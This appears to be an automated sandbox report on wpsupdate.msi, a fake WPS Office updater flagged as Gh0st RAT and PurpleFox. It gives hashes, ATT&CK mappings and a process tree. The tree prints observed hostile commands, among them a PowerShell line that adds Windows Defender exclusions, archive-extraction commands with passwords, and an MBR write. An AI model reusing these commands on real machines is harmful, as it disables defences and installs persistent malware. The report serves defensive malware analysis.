Overview

overview

10

Static

static

1

wpsupdate.msi

windows7-x64

8

wpsupdate.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-11-2024 04:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    wpsupdate.msi

  • Size

    28.2MB

  • MD5

    ef294458016f546c5eebd07d2dd98bad

  • SHA1

    66bb14f670055272e12899d401b8668cad15fac9

  • SHA256

    c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a

  • SHA512

    97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

  • SSDEEP

    786432:r3pUIX4j1lP1FYKJGIC6rO9HN47EbHxjprMfy6s0A:zpUIIj1l9FxJGIzcteEt2e0A

Score
10/10
gh0stratpurplefoxbootkitdiscoveryexecutionpersistenceprivilege_escalationratrootkittrojan

Malware Config

Signatures

  • Detect PurpleFox Rootkit 1 IoCs

    Detect PurpleFox Rootkit.

    rootkit
  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

    ratgh0strat
  • Gh0strat family
    gh0strat
  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

    rootkittrojanpurplefox
  • Purplefox family
    purplefox
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 8 IoCs
  • Executes dropped EXE 9 IoCs
  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1516
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3028
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 94C8925FDAC075AE237B5605BCE04F8E E Global\MSI0000
      2⤵
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4416
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
          "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1 -n 2
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1892
        • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
          "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4444
      • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
        "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3
        3⤵
        • Drops file in Program Files directory
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:632
      • C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
        "C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"
        3⤵
        • Writes to the Master Boot Record (MBR)
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3828
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:1484
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs"
    1⤵
    • Modifies data under HKEY_USERS
    PID:1796
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" install
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Executes dropped EXE
    PID:952
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" start
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    PID:1080
  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    "C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe"
    1⤵
    • Drops file in Program Files directory
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:436
    • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
      "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 151 -file file3 -mode mode3
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
        "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 62 -file file3 -mode mode3
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Event Triggered Execution

1
T1546

Installer Packages

1
T1546.016

Pre-OS Boot

1
T1542

Bootkit

1
T1542.003

Privilege Escalation

Event Triggered Execution

1
T1546

Installer Packages

1
T1546.016

Defense Evasion

Pre-OS Boot

1
T1542

Bootkit

1
T1542.003

System Binary Proxy Execution

1
T1218

Msiexec

1
T1218.007

Credential Access

Discovery

Peripheral Device Discovery

2
T1120

Query Registry

2
T1012

Remote System Discovery

1
T1018

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

System Network Configuration Discovery

1
T1016

Internet Connection Discovery

1
T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e57d9f6.rbs
    Filesize

    8KB

    MD5

    5d18475afd5a885c1cdd7fccb3049e32

    SHA1

    7c060f44c3d984f7d045440fe47724a1cc9d3b14

    SHA256

    e0b0a867b136f3ee3008f41666e0dadf5a7143acaf455ebaf7f5d4809bb85e85

    SHA512

    94f62085155cbf4392e48ec7e9a1eb56017d3952ecaf18dfb78f93c8c294ed4dae4771a81bfff8c2449ef4f7b950e54c0adae571d547c223563d8d046febdf59

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe
    Filesize

    2.1MB

    MD5

    fb22fb79f366c65257b7adb24c70d843

    SHA1

    ca6d29a4806d52350e1a50c7b71526dfaab2d525

    SHA256

    44f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d

    SHA512

    c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
    Filesize

    577KB

    MD5

    c31c4b04558396c6fabab64dcf366534

    SHA1

    fa836d92edc577d6a17ded47641ba1938589b09a

    SHA256

    9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

    SHA512

    814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs
    Filesize

    2KB

    MD5

    c5053a9c469416b52ac1ef0f3c4b6f3a

    SHA1

    1b2a53afcb6b22db953ad16116642a5e603d59c6

    SHA256

    7c54fccfbce7fef4dcd82fedd5811f43b553fca88811ace4e37d0837923830e5

    SHA512

    b9df8e58a1eabff54635a776a1c80c3c42643e3ad3ca3245eb0428b3e779ab903fcd2260d529c5fa34bb0f6b9dc62002cf1c0ba9e0d439b6905b12c837359ffa

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL
    Filesize

    1.5MB

    MD5

    d045828473a8165effd59a97232e6107

    SHA1

    f86bd9763d6c70ec3ca79134598de4fa44c6bc94

    SHA256

    9aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016

    SHA512

    07e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw
    Filesize

    1.5MB

    MD5

    831ff4029b30419da4ac4d32bf8ff05c

    SHA1

    8c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc

    SHA256

    ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d

    SHA512

    17f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe
    Filesize

    832KB

    MD5

    d305d506c0095df8af223ac7d91ca327

    SHA1

    679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a

    SHA256

    923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66

    SHA512

    94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log
    Filesize

    290B

    MD5

    4a3b8c0e53a3ca076d6d3659300c096c

    SHA1

    a49a2be43a87cde92a60f17dbd29d5d1d5cac353

    SHA256

    d2964d10f1431ffeb289bce75ca9b5f1ffa1ee58a9ee7f7028cc65413e8878b0

    SHA512

    8c94c15b557cc0d58d27d74b7e4cd0fba0ce84742f99d4b848be741ab48c82f9c864c47aa0986f31c9c75f4f005e8ff7a3e1963c1c00f217381081177a3b276d

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log
    Filesize

    458B

    MD5

    6923590bb4fac906ac5a9996ceb9362b

    SHA1

    2fae07821afeacee9441779591cf51eb0b39dda0

    SHA256

    b3b4e0f086c456e9156cd796a1b985ac426af7764647b197682b40b362c4bb1d

    SHA512

    db68e9982acb4e27ef36cd22d76b6aa42bbd100ae4eaed8a23feaf1a58c9f32470e7184cc6ca65a2c1218cfc873b21553403bf093518e5d9d61bff59a3ff704e

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log
    Filesize

    636B

    MD5

    1618efebb4abada9b83b90496410fb57

    SHA1

    61fbb12b77328d4cb5e237878caedfa20e936ca3

    SHA256

    462d8c4f845b5bcc5ea5582e2c21c97199c97429043410db7bcf468a2778aa81

    SHA512

    73ea0f4540a25d9234a10142c724bf2c9c8134a786a219fb88d9b4bf4403b4d69fdb6ce61104c4296ec507b9ccae79ec0c45fdea3c86bbac6cfe0b45ac15ab5d

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml
    Filesize

    450B

    MD5

    423a8dfeda50218b0d1f99440f1f19bb

    SHA1

    5979983be9657f79aa8523018779fef0ff004282

    SHA256

    c88617337e75ec9a2a8c9b5a589957f2df36dd28c9d5aeb5c1453e71b6fb3c02

    SHA512

    19f4764a3d46de34eb707e1f50685282bfd49d766d1cd8482dae6bd09ed382021dd09e5e9f506e4b2c402c89a29c5fad78ff68d29fda8ba33310c81b74467ab9

    Download Submit

  • C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
    Filesize

    6.0MB

    MD5

    57dadd6a929f64c2b1efe2d52c1c4985

    SHA1

    962cb227f81f885f23826c3e040aa9dbc97659cf

    SHA256

    996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5

    SHA512

    3f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1veqiqdc.l1i.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log
    Filesize

    2KB

    MD5

    b94b2c9b82f6d491f905dabd4b1c9069

    SHA1

    aa3ffb8acc8b306dd4b76a44ce5889350ced0952

    SHA256

    b91ce4bca71e439c20faba8fb2384efe87a71a8c0ac2a44061888589cbc89a11

    SHA512

    8a627721f668fba9c3ac276953939877bae40f99838fe993ceb4f6a5a64ed90603a11d119941f71a57e8dbb8d46ef8f7e14c043b72609cc33394cc87abf96d10

    Download Submit

  • C:\Windows\Installer\e57d9f5.msi
    Filesize

    28.2MB

    MD5

    ef294458016f546c5eebd07d2dd98bad

    SHA1

    66bb14f670055272e12899d401b8668cad15fac9

    SHA256

    c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a

    SHA512

    97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

    Download Submit

  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log
    Filesize

    1KB

    MD5

    122cf3c4f3452a55a92edee78316e071

    SHA1

    f2caa36d483076c92d17224cf92e260516b3cbbf

    SHA256

    42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0

    SHA512

    c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

    Download Submit

  • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
    Filesize

    24.1MB

    MD5

    b3dbb01f64836dd7868f6052e12bc6a6

    SHA1

    7ecaaa81392adbfb9cd1f885c7d9102879b00e25

    SHA256

    20f224401f9d8b6778e121a651aea92604df66708dea32e803d6e1558ebdfa23

    SHA512

    5391f412895ab4497a013670119ce048b29fb269878a3ba9ca25923d95148bad34f375cd423301fd444b632770d4b47f5658c22f498cbad64db42fe9b824666b

    Download Submit

  • \??\Volume{ff55cfe6-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{22748646-e610-4438-a06b-3a0bb54c46f1}_OnDiskSnapshotProp
    Filesize

    6KB

    MD5

    a4dcdabd7d8131de69eeb205b32f9353

    SHA1

    e8d856ba1888aeee22845b9d7152a4303628570b

    SHA256

    ab03315d3086eaf953e5aa73d527b3faa8b92545f38da41e50ccafd14b4e53ff

    SHA512

    2918c1c7f08106adde47369094c1c37eb9b48bd614b0897166dc752e993eab491d5f1bc2e024ba97493d55a01efa8698f81658886aef9c3c195d33f5d67b41ee

    Download Submit

  • memory/632-57-0x000000002A460000-0x000000002A48F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/952-78-0x0000000000D50000-0x0000000000E26000-memory.dmp

    Filesize

    856KB

    Download

  • memory/3836-109-0x0000000029E10000-0x0000000029E5D000-memory.dmp

    Filesize

    308KB

    Download

  • memory/3836-110-0x000000002BA30000-0x000000002BBED000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/4416-22-0x0000017BC0170000-0x0000017BC0192000-memory.dmp

    Filesize

    136KB

    Download